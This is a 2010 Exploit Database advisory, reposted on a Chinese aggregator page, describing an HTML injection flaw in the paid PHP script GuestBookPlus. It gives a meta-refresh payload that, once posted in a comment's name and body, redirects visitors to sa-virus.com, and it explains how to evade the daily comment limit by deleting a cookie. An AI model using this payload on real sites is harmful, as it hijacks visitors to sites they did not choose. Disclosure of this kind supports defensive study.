GuestBookPlus – HTML Injection / Bypass Comments Limit

• Exploit Database
• 10 阅读

• 作者： MiND C0re
  日期： 2010-08-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14839/

• =======================================================================
  # In the name of ALLAH !#
  =======================================================================
  # GuestBookPlus Script PHP (HTML Injection) Vuln.
  =======================================================================
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  #################################
  #_____ ____/___/#
  # / ___/ \ \/ / / / #
  #(__) \ \/ / / /#
  # /____/ \__/ /_/ #
  #################################
  ########################################################################
  # Name: GuestBookPlus Script PHP (HTML Injection) 
  # Vendor: http://websitekit.us/GBP_demo.html
  # Date: 2010-08-15
  # Author: MiND
  # Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Anti-Secure , Dr.$audi all Sa-ViRuS.CoM Members ..
  # Contact: f1_1nnym1nd@HoTMaiL.CoM
  # Home: WwW.Sa-ViRuS.CoM
  ########################################################################
  
  [~]Note : Its not free ,, Its by 28 $
  [~]You Can Buy It From : http://websitekit.us/guest_book_plus.html
  
  
  
  [~] HTML Injection Vuln . : Add a new comment using sign button
  Put on the name & body of your comment any html code like: 
  <meta http-equiv="refresh" content="0;url=http://sa-virus.com/" /> <==== ( thats redirecting to sa-virus.com ) 
  
  [~] Another note : You can bypass the limit of comments per day in this guestbook script 
  By deleting the saved cookie in your computer ;)